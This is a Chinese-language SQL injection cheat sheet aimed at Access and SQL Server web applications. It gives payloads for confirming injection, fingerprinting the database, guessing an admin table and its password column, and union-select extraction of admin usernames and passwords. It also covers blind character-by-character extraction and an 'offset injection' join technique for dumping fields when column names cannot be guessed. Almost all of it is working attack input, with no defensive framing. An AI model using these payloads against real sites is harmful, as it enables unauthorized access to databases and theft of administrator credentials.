1. 判断是否存在注入
'
and 1=1
and 1=2
or 1=2
or 1=2
' and '1'='1
' and '1'='2
2.判断数据库类型
and exists (select * from msysobjects) > 0 //判断access
and exists (select * from sysobjects) > 0 //判断sqlserver
3.判断数据库表
and exists (select * from admin) //判断是否有admin表
4.判断字段名称
and exists (select password from admin) //判断admin表中是否有password字段
5.判断字段长度
order by 10 //判断字段长度为10
6.使用联合查询获取想要的值
and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
7.获取具体字段值
and 1=2 union select 1,2,admin,4,password,6,7,8,9,10 from admin
其他查询语句:
1.判断admin字段的长度
and (select len(admin) from admin) = 5
and (select len(admin) from admin) > 5
2.判断password字段的长度
and (select len(password) from admin) = 5
3.判断admin字段的第一个字符的ASCII值
and (select top 1 asc(mid(admin,1,1)) from admin) > 100
4.判断admin字段的第二字符的ASCII值
and (select top 1 asc(mid(admin,2,1)) from admin) > 100
5.判断admin字段的第三个字符的ASCII值
and (select top 1 asc(mid(admin,3,1)) from admin) > 100
偏移注入:
主要用于解决能够猜解到表名,而列名猜解不到的情况。
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
1.使用*替换22
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
2.使用*替换21
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin
3.使用*替换20
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin
4.一次往前替换,直到不报错为止
5.带入公式计算
22-16=6
10+6*2=22
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4+6*3=22
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
将随机爆破出数据库中字段的值。